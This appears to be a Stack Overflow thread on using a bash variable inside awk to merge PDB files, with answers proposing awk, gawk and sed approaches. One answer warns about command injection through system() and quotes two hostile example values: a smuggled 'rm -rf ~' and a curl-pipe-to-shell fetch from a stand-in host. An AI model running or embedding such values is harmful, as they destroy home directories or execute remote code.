# awk: using bash variable inside the awk script

Tags: bash, awk

The following bash code incorporates the awk code to fuse file1 and file2 in the special fashion, detecting some blocks in the file2 and inserting there all strings from the file1.

```
#!/bin/bash
# v 0.09 beta
file1=/usr/data/temp/data1.pdb
file2=/usr/data/temp/data2.pdb
# merge the both
awk -v file="${file1}" '/^ENDMDL$/ {system("cat file");}; {print}' "${results}"/"${file2} >> output.pdb
```

The problem that I can not use in the awk part the variable "file", which relates to the file1 defined in bash

```
{system("cat file");}
```

othervise if I past here the full path of the file1 it works well

```
{system("cat /usr/data/temp/data1.pdb");}
```

how I could fix my awk code to be able using directly a bash variable there?

Comment: Using `system()` here induces serious security issues. Don't do it. You _can_ concatenate the awk variable to the string, but... like I said, serious security issues.

Comment: If you want to have your awk code read from a named file, there are _much_ better ways to do it -- like passing that filename on the end of your awk command line; you can have code that triggers between inputs when multiple inputs are passed on the command line.

Comment: Could you consider providing some trivial example `.pdb` files and desired output, to allow someone to build and test an answer that _doesn't_ use `system()`?

Comment: that's directly related to my previous topic: https://stackoverflow.com/questions/70623033/bash-cat-grep-to-produce-several-replicas-merging-two-filles/70624746#70624746

Comment: @HotJAMS: I have posted a solution on previous question that doesn't call `system` or `getline` and that allows you to use variable names instead of hard coding file names.

Answer (score 1):

#### The Literal (But Evil, Insecure) Answer

To answer your *literal question*:

```
awk -v insecure="filename" 'BEGIN { system("cat " insecure) }'
```

...will run `cat filename`.

But if someone passed `insecure="filename; rm -rf ~"` or `insecure='$(curl http://evil.co | sh)'`, you'd have a very bad day.

---

#### The Right Answer

Pass the filename on awk's command line, and check `FNR` to see if you're reading the first file or a subsequent one.

Comment: so the only things that I have to do is remove "" from the awk variable like awk -v file="${file1}" '/^ENDMDL$/ {system("cat " file);}; {print}' "${results}"/"${file2} >> output.pdb

Comment: why this is bad method for file fusion ?

Comment: It's a bad method because it can treat filenames as code to run, so if someone can give you files with names they choose, they can make you run any code they want.

Answer (score 1):

Use GNU Awk's `readfile` library:

```
gawk -i readfile -v file1="$file1" 'BEGIN { file1_data = readfile(file1) }
        /^ENDMDL$/ { printf "%s", file1_data } 1' ...
```

Alternative you can use a `while ((getline < file1) > 1)` loop to fetch the data.

Answer (score 0):

This is easier with `sed`

```
$ sed '/^ENDMDL$/r file1' file2
```

inserts file1 after the marker.

to replace the marker line with the file1 contents

```
$ sed -e '/^ENDMDL$/{r file1' -e 'd}' file2
```